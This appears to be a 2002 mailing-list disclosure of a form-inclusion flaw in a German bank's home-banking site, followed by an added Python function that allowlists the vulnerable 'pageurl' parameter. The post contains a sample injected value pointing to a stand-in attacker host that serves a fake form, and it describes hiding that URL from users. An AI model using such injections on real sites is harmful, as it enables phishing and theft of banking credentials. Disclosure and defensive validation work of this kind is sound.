From: hnz geeratz[room23] (staffroom23.org)
Date: Fri Apr 05 2002 - 04:12:49 CST
I found this security issue on the German HypoVereinsbank.
They were informed 3 months ago; still, nothing has changed.
The security hole will allow an attacker to include his own forms in the
website. This will give him an option to collect sensitive information.
It is a home banking system!
Take a look at this (long) URL:
Now it is possible to change the
part to something like pageurl=http://www.evol.org/fake_form.php
so it is possible to include everything in this webpage.
The attacker could obscure the URL in a form like:
so the user will not notice that the included form is not from the original
It opens a port to a new form of social hacking and data grabbing.
greetings hnz g
-- hnz geeratz | staffroom23.org
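
A server-side check for the `pageurl` parameter described in the message above, as an added example that is not part of the original post or the bank's code. It accepts only local paths or https URLs on an allowlisted host and normalizes encoded values first; `ALLOWED_HOSTS`, `is_safe_pageurl` and `www.bank.example` are hypothetical names chosen for illustration.

```python
from urllib.parse import unquote, urlsplit

# Hypothetical allowlist; www.bank.example stands in for the site's real host.
ALLOWED_HOSTS = frozenset({"www.bank.example"})


def is_safe_pageurl(value, allowed_hosts=ALLOWED_HOSTS):
    """Accept only a local absolute path or an https URL on an allowed host."""
    # Decode until stable so %68ttp or %2568ttp cannot hide a scheme or host.
    for _ in range(5):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    else:
        return False  # still changing after five rounds: treat as hostile

    # Whitespace, control characters and backslashes confuse URL parsers.
    if not value or any(c == "\\" or c.isspace() or ord(c) < 0x20 for c in value):
        return False
    try:
        parts = urlsplit(value)
    except ValueError:
        return False

    if not parts.scheme and not parts.netloc:
        # Local include: must be rooted and must not climb out with "..".
        return value.startswith("/") and ".." not in parts.path.split("/")

    if parts.scheme != "https":
        return False  # also rejects scheme-relative //host/path
    if parts.username is not None or parts.password is not None:
        return False  # https://www.bank.example@other-host/ userinfo trick
    host = (parts.hostname or "").rstrip(".")
    return host in allowed_hosts
```

The page renderer would call this before fetching or embedding anything named by `pageurl` and fall back to a fixed default page when it returns `False`.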